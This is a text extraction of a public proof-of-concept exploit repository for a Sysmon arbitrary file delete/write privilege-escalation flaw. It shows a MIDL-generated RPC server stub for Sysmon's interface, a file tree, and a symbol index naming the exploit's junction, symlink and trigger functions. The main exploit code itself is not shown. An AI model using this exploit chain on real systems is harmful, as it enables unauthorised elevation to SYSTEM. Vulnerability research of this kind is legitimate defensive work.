static const RPC_SERVER_INTERFACE DefaultIfName___RpcServerInterface =
{
sizeof(RPC_SERVER_INTERFACE),
{{0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}},{1,0}},
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
(RPC_DISPATCH_TABLE*)&DefaultIfName_v1_0_DispatchTable,
0,
0,
0,
&DefaultIfName_ServerInfo,
0x06000000
};
RPC_IF_HANDLE DefaultIfName_v1_0_s_ifspec = (RPC_IF_HANDLE)& DefaultIfName___RpcServerInterface;
extern const MIDL_STUB_DESC DefaultIfName_StubDesc;
#if !defined(__RPC_WIN64__)
#error Invalid build platform for this stub.
#endif
static const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString =
{
0,
{
/* Procedure Proc0 */
0x0, /* 0 */
0x48, /* Old Flags: */
/* 2 */ NdrFcLong( 0x0 ), /* 0 */
/* 6 */ NdrFcShort( 0x0 ), /* 0 */
/* 8 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */
/* 10 */ 0x32, /* FC_BIND_PRIMITIVE */
0x0, /* 0 */
/* 12 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */
/* 14 */ NdrFcShort( 0x0 ), /* 0 */
/* 16 */ NdrFcShort( 0x8 ), /* 8 */
/* 18 */ 0x44, /* Oi2 Flags: has return, has ext, */
0x1, /* 1 */
/* 20 */ 0xa, /* 10 */
0x1, /* Ext Flags: new corr desc, */
/* 22 */ NdrFcShort( 0x0 ), /* 0 */
/* 24 */ NdrFcShort( 0x0 ), /* 0 */
/* 26 */ NdrFcShort( 0x0 ), /* 0 */
/* 28 */ NdrFcShort( 0x0 ), /* 0 */
/* Return value */
/* 30 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */
/* 32 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */
/* 34 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Procedure Proc1 */
/* 36 */ 0x0, /* 0 */
0x48, /* Old Flags: */
/* 38 */ NdrFcLong( 0x0 ), /* 0 */
/* 42 */ NdrFcShort( 0x1 ), /* 1 */
/* 44 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */
/* 46 */ 0x32, /* FC_BIND_PRIMITIVE */
0x0, /* 0 */
/* 48 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */
/* 50 */ NdrFcShort( 0x8 ), /* 8 */
/* 52 */ NdrFcShort( 0x0 ), /* 0 */
/* 54 */ 0x42, /* Oi2 Flags: clt must size, has ext, */
0x2, /* 2 */
/* 56 */ 0xa, /* 10 */
0x1, /* Ext Flags: new corr desc, */
/* 58 */ NdrFcShort( 0x0 ), /* 0 */
/* 60 */ NdrFcShort( 0x0 ), /* 0 */
/* 62 */ NdrFcShort( 0x0 ), /* 0 */
/* 64 */ NdrFcShort( 0x0 ), /* 0 */
/* Parameter arg_0 */
/* 66 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 68 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */
/* 70 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Parameter arg_1 */
/* 72 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */
/* 74 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */
/* 76 */ NdrFcShort( 0x4 ), /* Type Offset=4 */
0x0
}
};
static const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString =
{
0,
{
NdrFcShort( 0x0 ), /* 0 */
/* 2 */
0x11, 0x8, /* FC_RP [simple_pointer] */
/* 4 */
0x25, /* FC_C_WSTRING */
0x5c, /* FC_PAD */
0x0
}
};
static const unsigned short DefaultIfName_FormatStringOffsetTable[] =
{
0,
36
};
static const RPC_DISPATCH_FUNCTION DefaultIfName_table[] =
{
NdrServerCall2,
NdrServerCall2,
0
};
static const RPC_DISPATCH_TABLE DefaultIfName_v1_0_DispatchTable =
{
2,
(RPC_DISPATCH_FUNCTION*)DefaultIfName_table
};
#endif /* defined(_M_AMD64)*/
/* this ALWAYS GENERATED file contains the RPC server stubs */
/* File created by MIDL compiler version 8.01.0622 */
/* at Mon Jan 18 19:14:07 2038
*/
/* Compiler settings for sysmon.idl:
Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622
protocol : all , ms_ext, c_ext, robust
error checks: allocation ref bounds_check enum stub_data
VC __declspec() decoration level:
__declspec(uuid()), __declspec(selectany), __declspec(novtable)
DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING( ) */
#if defined(_M_AMD64)
#if !defined(__RPC_WIN64__)
#error Invalid build platform for this stub.
#endif
#include "ndr64types.h"
#include "pshpack8.h"
typedef
struct _NDR64_CONFORMANT_STRING_FORMAT
__midl_frag7_t;
extern const __midl_frag7_t __midl_frag7;
typedef
struct _NDR64_POINTER_FORMAT
__midl_frag6_t;
extern const __midl_frag6_t __midl_frag6;
typedef
NDR64_FORMAT_CHAR
__midl_frag5_t;
extern const __midl_frag5_t __midl_frag5;
typedef
struct
{
struct _NDR64_PROC_FORMAT frag1;
struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;
struct _NDR64_PARAM_FORMAT frag3;
struct _NDR64_PARAM_FORMAT frag4;
}
__midl_frag4_t;
extern const __midl_frag4_t __midl_frag4;
typedef
struct
{
struct _NDR64_PROC_FORMAT frag1;
struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;
struct _NDR64_PARAM_FORMAT frag3;
}
__midl_frag2_t;
extern const __midl_frag2_t __midl_frag2;
typedef
NDR64_FORMAT_UINT32
__midl_frag1_t;
extern const __midl_frag1_t __midl_frag1;
static const __midl_frag7_t __midl_frag7 =
{
/* *wchar_t */
{
/* *wchar_t */
0x64, /* FC64_CONF_WCHAR_STRING */
{
/* *wchar_t */
0,
0,
0,
0,
0,
0,
0,
0
},
(NDR64_UINT16) 2 /* 0x2 */
}
};
static const __midl_frag6_t __midl_frag6 =
{
/* *wchar_t */
0x20, /* FC64_RP */
(NDR64_UINT8) 0 /* 0x0 */,
(NDR64_UINT16) 0 /* 0x0 */,
&__midl_frag7
};
static const __midl_frag5_t __midl_frag5 =
0x5 /* FC64_INT32 */;
static const __midl_frag4_t __midl_frag4 =
{
/* Proc1 */
{
/* Proc1 */ /* procedure Proc1 */
(NDR64_UINT32) 17039424 /* 0x1040040 */, /* explicit handle */ /* IsIntrepreted, ClientMustSize, HasExtensions */
(NDR64_UINT32) 24 /* 0x18 */ , /* Stack size */
(NDR64_UINT32) 8 /* 0x8 */,
(NDR64_UINT32) 0 /* 0x0 */,
(NDR64_UINT16) 0 /* 0x0 */,
(NDR64_UINT16) 0 /* 0x0 */,
(NDR64_UINT16) 2 /* 0x2 */,
(NDR64_UINT16) 8 /* 0x8 */
},
{
/* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
{
/* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
0x72, /* FC64_BIND_PRIMITIVE */
(NDR64_UINT8) 0 /* 0x0 */,
0 /* 0x0 */, /* Stack offset */
(NDR64_UINT8) 0 /* 0x0 */,
(NDR64_UINT8) 0 /* 0x0 */
},
(NDR64_UINT16) 0 /* 0x0 */ /* Notify index */
},
{
/* arg_0 */ /* parameter arg_0 */
&__midl_frag5,
{
/* arg_0 */
0,
0,
0,
1,
0,
0,
1,
1,
0,
0,
0,
0,
0,
(NDR64_UINT16) 0 /* 0x0 */,
0
}, /* [in], Basetype, ByValue */
(NDR64_UINT16) 0 /* 0x0 */,
8 /* 0x8 */, /* Stack offset */
},
{
/* arg_1 */ /* parameter arg_1 */
&__midl_frag7,
{
/* arg_1 */
1,
1,
0,
1,
0,
0,
0,
0,
1,
0,
0,
0,
0,
(NDR64_UINT16) 0 /* 0x0 */,
0
}, /* MustSize, MustFree, [in], SimpleRef */
(NDR64_UINT16) 0 /* 0x0 */,
16 /* 0x10 */, /* Stack offset */
}
};
static const __midl_frag2_t __midl_frag2 =
{
/* Proc0 */
{
/* Proc0 */ /* procedure Proc0 */
(NDR64_UINT32) 17301568 /* 0x1080040 */, /* explicit handle */ /* IsIntrepreted, HasReturn, HasExtensions */
(NDR64_UINT32) 16 /* 0x10 */ , /* Stack size */
(NDR64_UINT32) 0 /* 0x0 */,
(NDR64_UINT32) 8 /* 0x8 */,
(NDR64_UINT16) 0 /* 0x0 */,
(NDR64_UINT16) 0 /* 0x0 */,
(NDR64_UINT16) 1 /* 0x1 */,
(NDR64_UINT16) 8 /* 0x8 */
},
{
/* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
{
/* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
0x72, /* FC64_BIND_PRIMITIVE */
(NDR64_UINT8) 0 /* 0x0 */,
0 /* 0x0 */, /* Stack offset */
(NDR64_UINT8) 0 /* 0x0 */,
(NDR64_UINT8) 0 /* 0x0 */
},
(NDR64_UINT16) 0 /* 0x0 */ /* Notify index */
},
{
/* long */ /* parameter long */
&__midl_frag5,
{
/* long */
0,
0,
0,
0,
1,
1,
1,
1,
0,
0,
0,
0,
0,
(NDR64_UINT16) 0 /* 0x0 */,
0
}, /* [out], IsReturn, Basetype, ByValue */
(NDR64_UINT16) 0 /* 0x0 */,
8 /* 0x8 */, /* Stack offset */
}
};
static const __midl_frag1_t __midl_frag1 =
(NDR64_UINT32) 0 /* 0x0 */;
#include "poppack.h"
static const FormatInfoRef DefaultIfName_Ndr64ProcTable[] =
{
&__midl_frag2,
&__midl_frag4
};
static const MIDL_STUB_DESC DefaultIfName_StubDesc =
{
(void *)& DefaultIfName___RpcServerInterface,
MIDL_user_allocate,
MIDL_user_free,
0,
0,
0,
0,
0,
sysmon__MIDL_TypeFormatString.Format,
1, /* -error bounds_check flag */
0x60001, /* Ndr library version */
0,
0x801026e, /* MIDL Version 8.1.622 */
0,
0,
0, /* notify & notify_flag routine table */
0x2000001, /* MIDL flag */
0, /* cs routines */
(void *)& DefaultIfName_ServerInfo, /* proxy/server info */
0
};
static const RPC_DISPATCH_FUNCTION DefaultIfName_NDR64__table[] =
{
NdrServerCallAll,
NdrServerCallAll,
0
};
static const RPC_DISPATCH_TABLE DefaultIfName_NDR64__v1_0_DispatchTable =
{
2,
(RPC_DISPATCH_FUNCTION*)DefaultIfName_NDR64__table
};
static const MIDL_SYNTAX_INFO DefaultIfName_SyntaxInfo [ 2 ] =
{
{
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
(RPC_DISPATCH_TABLE*)&DefaultIfName_v1_0_DispatchTable,
sysmon__MIDL_ProcFormatString.Format,
DefaultIfName_FormatStringOffsetTable,
sysmon__MIDL_TypeFormatString.Format,
0,
0,
0
}
,{
{{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}},
(RPC_DISPATCH_TABLE*)&DefaultIfName_NDR64__v1_0_DispatchTable,
0 ,
(unsigned short *) DefaultIfName_Ndr64ProcTable,
0,
0,
0,
0
}
};
static const SERVER_ROUTINE DefaultIfName_ServerRoutineTable[] =
{
(SERVER_ROUTINE)Proc0,
(SERVER_ROUTINE)Proc1
};
static const MIDL_SERVER_INFO DefaultIfName_ServerInfo =
{
&DefaultIfName_StubDesc,
DefaultIfName_ServerRoutineTable,
sysmon__MIDL_ProcFormatString.Format,
(unsigned short *) DefaultIfName_FormatStringOffsetTable,
0,
(RPC_SYNTAX_IDENTIFIER*)&_NDR64_RpcTransferSyntax,
2,
(MIDL_SYNTAX_INFO*)DefaultIfName_SyntaxInfo
};
#if _MSC_VER >= 1200
#pragma warning(pop)
#endif
#endif /* defined(_M_AMD64)*/
gitextract_zfsi2xfe/
├── README.md
├── v1/
│ ├── README.md
│ └── SysmonEoP/
│ ├── SysmonEOP.sln
│ ├── SysmonEOP.vcxproj
│ ├── SysmonEOP.vcxproj.filters
│ ├── SysmonEOP.vcxproj.user
│ ├── def.h
│ ├── main.cpp
│ ├── resource.aps
│ ├── resource.h
│ ├── resource.rc
│ ├── sysmon.idl
│ ├── sysmon_c.c
│ ├── sysmon_h.h
│ └── sysmon_s.c
└── v2/
├── README.md
└── SysmonEoP/
├── SysmonEOP.sln
├── SysmonEOP.vcxproj
├── SysmonEOP.vcxproj.filters
├── SysmonEOP.vcxproj.user
├── def.h
├── main.cpp
├── resource.aps
├── resource.h
├── resource.rc
├── sysmon.idl
├── sysmon_c.c
├── sysmon_h.h
└── sysmon_s.c
SYMBOL INDEX (75 symbols across 8 files)
FILE: v1/SysmonEoP/def.h
type REPARSE_DATA_BUFFER (line 42) | typedef struct _REPARSE_DATA_BUFFER {
type OBJECT_DIRECTORY_INFORMATION (line 67) | typedef struct _OBJECT_DIRECTORY_INFORMATION {
type NTSYSAPI (line 75) | typedef NTSYSAPI NTSTATUS(NTAPI* _NtCreateFile)(PHANDLE FileHandle, ACCE...
type NTSYSAPI (line 76) | typedef NTSYSAPI VOID(NTAPI* _RtlInitUnicodeString)(PUNICODE_STRING Dest...
type NTSYSAPI (line 77) | typedef NTSYSAPI NTSTATUS(NTAPI* _NtOpenDirectoryObject)(OUT PHANDLE Dir...
type NTSYSAPI (line 78) | typedef NTSYSAPI NTSTATUS(NTAPI* _NtQueryDirectoryObject)(_In_ HAND...
type NTSYSCALLAPI (line 79) | typedef NTSYSCALLAPI NTSTATUS(NTAPI* _NtSetInformationFile)(HANDLE File...
FILE: v1/SysmonEoP/main.cpp
function wmain (line 4) | int wmain(int argc, wchar_t* argv[])
function load (line 71) | void load() {
function BOOL (line 89) | BOOL CreateJunction(HANDLE hDir, LPCWSTR target) {
function BOOL (line 129) | BOOL DeleteJunction(HANDLE handle) {
function BOOL (line 152) | BOOL DosDeviceSymLink(LPCWSTR object, LPCWSTR target) {
function BOOL (line 166) | BOOL DelDosDeviceSymLink(LPCWSTR object, LPCWSTR target) {
function LPWSTR (line 181) | LPWSTR Find() {
function Trigger (line 234) | void Trigger(LPWSTR alpc)
function LPWSTR (line 260) | LPWSTR BuildPath(LPCWSTR path) {
function BOOL (line 265) | BOOL AddPrinterDriverWmi() {
FILE: v1/SysmonEoP/sysmon_c.c
type sysmon_MIDL_TYPE_FORMAT_STRING (line 40) | typedef struct _sysmon_MIDL_TYPE_FORMAT_STRING
type sysmon_MIDL_PROC_FORMAT_STRING (line 46) | typedef struct _sysmon_MIDL_PROC_FORMAT_STRING
type sysmon_MIDL_EXPR_FORMAT_STRING (line 52) | typedef struct _sysmon_MIDL_EXPR_FORMAT_STRING
function Proc0 (line 99) | long Proc0(
function Proc1 (line 115) | void Proc1(
type __midl_frag7_t (line 264) | typedef
type __midl_frag6_t (line 269) | typedef
type NDR64_FORMAT_CHAR (line 274) | typedef
type __midl_frag4_t (line 279) | typedef
type __midl_frag2_t (line 290) | typedef
type NDR64_FORMAT_UINT32 (line 300) | typedef
FILE: v1/SysmonEoP/sysmon_s.c
type sysmon_MIDL_TYPE_FORMAT_STRING (line 39) | typedef struct _sysmon_MIDL_TYPE_FORMAT_STRING
type sysmon_MIDL_PROC_FORMAT_STRING (line 45) | typedef struct _sysmon_MIDL_PROC_FORMAT_STRING
type sysmon_MIDL_EXPR_FORMAT_STRING (line 51) | typedef struct _sysmon_MIDL_EXPR_FORMAT_STRING
type __midl_frag7_t (line 238) | typedef
type __midl_frag6_t (line 243) | typedef
type NDR64_FORMAT_CHAR (line 248) | typedef
type __midl_frag4_t (line 253) | typedef
type __midl_frag2_t (line 264) | typedef
type NDR64_FORMAT_UINT32 (line 274) | typedef
FILE: v2/SysmonEoP/def.h
type REPARSE_DATA_BUFFER (line 40) | typedef struct _REPARSE_DATA_BUFFER {
type OBJECT_DIRECTORY_INFORMATION (line 65) | typedef struct _OBJECT_DIRECTORY_INFORMATION {
type NTSYSAPI (line 73) | typedef NTSYSAPI NTSTATUS(NTAPI* _NtCreateFile)(PHANDLE FileHandle, ACCE...
type NTSYSAPI (line 74) | typedef NTSYSAPI VOID(NTAPI* _RtlInitUnicodeString)(PUNICODE_STRING Dest...
type NTSYSAPI (line 75) | typedef NTSYSAPI NTSTATUS(NTAPI* _NtOpenDirectoryObject)(OUT PHANDLE Dir...
type NTSYSAPI (line 76) | typedef NTSYSAPI NTSTATUS(NTAPI* _NtQueryDirectoryObject)(_In_ HAND...
type NTSYSCALLAPI (line 77) | typedef NTSYSCALLAPI NTSTATUS(NTAPI* _NtSetInformationFile)(HANDLE File...
FILE: v2/SysmonEoP/main.cpp
function wmain (line 4) | int wmain(int argc, wchar_t* argv[])
function VOID (line 61) | VOID SetJunction() {
function load (line 78) | void load() {
function BOOL (line 96) | BOOL CreateJunction(HANDLE hDir, LPCWSTR target) {
function BOOL (line 136) | BOOL DeleteJunction(HANDLE handle) {
function BOOL (line 159) | BOOL DosDeviceSymLink(LPCWSTR object, LPCWSTR target) {
function BOOL (line 173) | BOOL DelDosDeviceSymLink(LPCWSTR object, LPCWSTR target) {
function LPWSTR (line 188) | LPWSTR Find() {
function Trigger (line 241) | void Trigger(LPWSTR alpc)
function LPWSTR (line 266) | LPWSTR BuildPath(LPCWSTR path) {
function BOOL (line 271) | BOOL AddPrinterDriverWmi() {
FILE: v2/SysmonEoP/sysmon_c.c
type sysmon_MIDL_TYPE_FORMAT_STRING (line 40) | typedef struct _sysmon_MIDL_TYPE_FORMAT_STRING
type sysmon_MIDL_PROC_FORMAT_STRING (line 46) | typedef struct _sysmon_MIDL_PROC_FORMAT_STRING
type sysmon_MIDL_EXPR_FORMAT_STRING (line 52) | typedef struct _sysmon_MIDL_EXPR_FORMAT_STRING
function Proc0 (line 99) | long Proc0(
function Proc1 (line 115) | void Proc1(
type __midl_frag7_t (line 264) | typedef
type __midl_frag6_t (line 269) | typedef
type NDR64_FORMAT_CHAR (line 274) | typedef
type __midl_frag4_t (line 279) | typedef
type __midl_frag2_t (line 290) | typedef
type NDR64_FORMAT_UINT32 (line 300) | typedef
FILE: v2/SysmonEoP/sysmon_s.c
type sysmon_MIDL_TYPE_FORMAT_STRING (line 39) | typedef struct _sysmon_MIDL_TYPE_FORMAT_STRING
type sysmon_MIDL_PROC_FORMAT_STRING (line 45) | typedef struct _sysmon_MIDL_PROC_FORMAT_STRING
type sysmon_MIDL_EXPR_FORMAT_STRING (line 51) | typedef struct _sysmon_MIDL_EXPR_FORMAT_STRING
type __midl_frag7_t (line 238) | typedef
type __midl_frag6_t (line 243) | typedef
type NDR64_FORMAT_CHAR (line 248) | typedef
type __midl_frag4_t (line 253) | typedef
type __midl_frag2_t (line 264) | typedef
type NDR64_FORMAT_UINT32 (line 274) | typedef
Condensed preview — 29 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (137K chars).
[
{
"path": "README.md",
"chars": 3533,
"preview": "# SysmonEoP\n\nProof of Concept for arbitrary file delete/write in Sysmon (CVE-2022-41120/CVE-2022-44704)\n\n# Vulnerability"
},
{
"path": "v1/README.md",
"chars": 51,
"preview": "Exploit for verions before 14.11.\n\n\n"
},
{
"path": "v1/SysmonEoP/SysmonEOP.sln",
"chars": 1436,
"preview": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.3"
},
{
"path": "v1/SysmonEoP/SysmonEOP.vcxproj",
"chars": 7620,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/ms"
},
{
"path": "v1/SysmonEoP/SysmonEOP.vcxproj.filters",
"chars": 1533,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "v1/SysmonEoP/SysmonEOP.vcxproj.user",
"chars": 166,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/m"
},
{
"path": "v1/SysmonEoP/def.h",
"chars": 3517,
"preview": "#include <Windows.h>\r\n#include <winternl.h>\r\n#include <combaseapi.h>\r\n#include <comdef.h>\r\n#include <stdio.h>\r\n#include "
},
{
"path": "v1/SysmonEoP/main.cpp",
"chars": 14821,
"preview": "#include \"def.h\"\r\n\r\n\r\nint wmain(int argc, wchar_t* argv[])\r\n{\r\n load();\r\n LPWSTR alpc = Find();\r\n HANDLE h1;\r\n "
},
{
"path": "v1/SysmonEoP/resource.h",
"chars": 469,
"preview": "//{{NO_DEPENDENCIES}}\r\n// Microsoft Visual C++ generated include file.\r\n// Used by FolderOrFileDeleteToSystem.rc\r\n//\r\n#d"
},
{
"path": "v1/SysmonEoP/resource.rc",
"chars": 1522,
"preview": "// Microsoft Visual C++ generated resource script.\r\n//\r\n#include \"resource.h\"\r\n\r\n#define APSTUDIO_READONLY_SYMBOLS\r\n////"
},
{
"path": "v1/SysmonEoP/sysmon.idl",
"chars": 187,
"preview": "[\r\n\tuuid(1e72d56f-eec6-44d3-bbed-5caa50790812),\r\n\tversion(1.0),\r\n]\r\ninterface DefaultIfName\r\n{\r\n\r\n\tlong Proc0(\r\n\t);\r\n\r\n\t"
},
{
"path": "v1/SysmonEoP/sysmon_c.c",
"chars": 13907,
"preview": "\r\n\r\n/* this ALWAYS GENERATED file contains the RPC client stubs */\r\n\r\n\r\n /* File created by MIDL compiler version 8.01.0"
},
{
"path": "v1/SysmonEoP/sysmon_h.h",
"chars": 1744,
"preview": "\r\n\r\n/* this ALWAYS GENERATED file contains the definitions for the interfaces */\r\n\r\n\r\n /* File created by MIDL compiler "
},
{
"path": "v1/SysmonEoP/sysmon_s.c",
"chars": 14051,
"preview": "\r\n\r\n/* this ALWAYS GENERATED file contains the RPC server stubs */\r\n\r\n\r\n /* File created by MIDL compiler version 8.01.0"
},
{
"path": "v2/README.md",
"chars": 130,
"preview": "Exploit for versions 14.11/14.12 (works on versions below 14.11 but less stable as we need to race with Sysmon).\n\n![PoC]"
},
{
"path": "v2/SysmonEoP/SysmonEOP.sln",
"chars": 1436,
"preview": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.3"
},
{
"path": "v2/SysmonEoP/SysmonEOP.vcxproj",
"chars": 7620,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/ms"
},
{
"path": "v2/SysmonEoP/SysmonEOP.vcxproj.filters",
"chars": 1533,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "v2/SysmonEoP/SysmonEOP.vcxproj.user",
"chars": 166,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/m"
},
{
"path": "v2/SysmonEoP/def.h",
"chars": 3518,
"preview": "#include <Windows.h>\r\n#include <winternl.h>\r\n#include <combaseapi.h>\r\n#include <comdef.h>\r\n#include <stdio.h>\r\n#include "
},
{
"path": "v2/SysmonEoP/main.cpp",
"chars": 14956,
"preview": "#include \"def.h\"\r\n\r\n\r\nint wmain(int argc, wchar_t* argv[])\r\n{\r\n load();\r\n LPWSTR alpc = Find();\r\n HANDLE h1;\r\n "
},
{
"path": "v2/SysmonEoP/resource.h",
"chars": 469,
"preview": "//{{NO_DEPENDENCIES}}\r\n// Microsoft Visual C++ generated include file.\r\n// Used by FolderOrFileDeleteToSystem.rc\r\n//\r\n#d"
},
{
"path": "v2/SysmonEoP/resource.rc",
"chars": 1522,
"preview": "// Microsoft Visual C++ generated resource script.\r\n//\r\n#include \"resource.h\"\r\n\r\n#define APSTUDIO_READONLY_SYMBOLS\r\n////"
},
{
"path": "v2/SysmonEoP/sysmon.idl",
"chars": 187,
"preview": "[\r\n\tuuid(1e72d56f-eec6-44d3-bbed-5caa50790812),\r\n\tversion(1.0),\r\n]\r\ninterface DefaultIfName\r\n{\r\n\r\n\tlong Proc0(\r\n\t);\r\n\r\n\t"
},
{
"path": "v2/SysmonEoP/sysmon_c.c",
"chars": 13907,
"preview": "\r\n\r\n/* this ALWAYS GENERATED file contains the RPC client stubs */\r\n\r\n\r\n /* File created by MIDL compiler version 8.01.0"
},
{
"path": "v2/SysmonEoP/sysmon_h.h",
"chars": 1744,
"preview": "\r\n\r\n/* this ALWAYS GENERATED file contains the definitions for the interfaces */\r\n\r\n\r\n /* File created by MIDL compiler "
},
{
"path": "v2/SysmonEoP/sysmon_s.c",
"chars": 14051,
"preview": "\r\n\r\n/* this ALWAYS GENERATED file contains the RPC server stubs */\r\n\r\n\r\n /* File created by MIDL compiler version 8.01.0"
}
]
// ... and 2 more files (download for full content)
About this extraction
This page contains the full source code of the Wh04m1001/SysmonEoP GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 29 files (122.8 KB), approximately 38.7k tokens, and a symbol index with 75 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.